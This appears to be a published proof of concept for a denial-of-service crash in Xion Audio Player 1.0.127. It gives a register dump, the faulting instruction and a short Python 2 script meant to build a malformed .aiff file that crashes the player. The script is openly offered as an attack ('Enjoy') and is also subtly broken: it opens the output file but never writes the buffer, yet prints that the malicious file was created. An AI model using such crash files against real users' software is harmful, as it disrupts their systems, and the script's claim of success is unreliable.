# -------------------------------------------------------------------
# Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability
# found by condis
# Download: http://xion.r2.com.au/index.php?page=download
# Tested on : Windows XP SP3 Professional PL
# Registers :
# EAX 00000000
# ECX 02D0B488
# EDX 7C90E4F4 ntdll.KiFastSystemCallRet
# EBX 02D0B4F8
# ESP 02D0B4F8
# EBP 02D0CA60
# ESI 003D8D80
# EDI 00001A00
# EIP 11013C18 BASS.11013C18
# 11013C18 C740 20 01000000 MOV DWORD PTR DS:[EAX+20],1 <--- crash
# "Access Violation while writing to 00000020"
# I've also found this kind of bug while playing around with .flac
# files so I think that handling all of the supported formats must be
# really messed up :<
# --------------------------------------------------------------------
evil= "FORM\x00\x00\x37\xA4AIFFCOMM"
evil += "A" # <--- crash (rest of the file doesn't matters)
aiff = open('xion-crash.aiff', 'w')
print "Malicious .aiff file has been created. Enjoy"